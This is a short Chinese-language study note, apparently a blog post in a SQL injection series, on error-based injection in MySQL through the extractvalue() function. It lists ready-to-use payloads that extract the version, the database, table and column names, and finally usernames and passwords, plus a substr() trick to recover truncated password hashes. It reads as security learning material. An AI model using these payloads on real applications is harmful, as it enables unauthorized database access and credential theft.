数据库笔记3

报错注入
通过ExtractValue报错
and extractvalue(1,(payload)) //两个参数第一个参数是字符串格式,第二个参数是Xpath格式的字符串,如果格式不符合会报错

and extractvalue(1,concat(0x7e,(select@@version),0x7e))
输出的时候如果第二个参数加了payload且格式出错,那么extractvalue就会把第二个参数相应的payload执行的信息报错出来

select * from users where id =1 and extractvalue(1,concat(0x23,database(),0x23))
通过concat字符串拼接函数拼接#号,既让页面报错也让database()解析

select * from users where id =1 and extractvalue(1,concat(0x23,(select table_name from information_schema.tables where table_schema=‘baji’ limit 0,1),0x23))
查询数据库为baji的表名

select * from users where id =1 and extractvalue(1,concat(0x23,(select column_name from information_schema.columns where table_schema=‘baji’ and table_name=‘users’ limit 0,1),0x23))
查询数据库为baji表名为users中的字段

select * from users where id =1 and extractvalue(1,concat(0x23,(select username from users limit 0,1),0x23))
得到用户名

select * from users where id =1 and extractvalue(1,concat(0x23,(select password from users limit 0,1),0x23))
得到密码,但是此时的密码是不完整的,缺了一位 因为只能显示32位

此时可以用substr(str,1,1)函数 第一个参数是要截取的字符串,第二个参数是截取的开始位置,弟三个参数是截取的长度
select * from users where id =1 and extractvalue(1,concat(0x23,substr((select password from users limit 0,1),32,1),0x23))

上一篇:SQL注入篇——mysql 联合查询注入


下一篇:Mysql 下 Insert、Update、Delete、Order By、Group By注入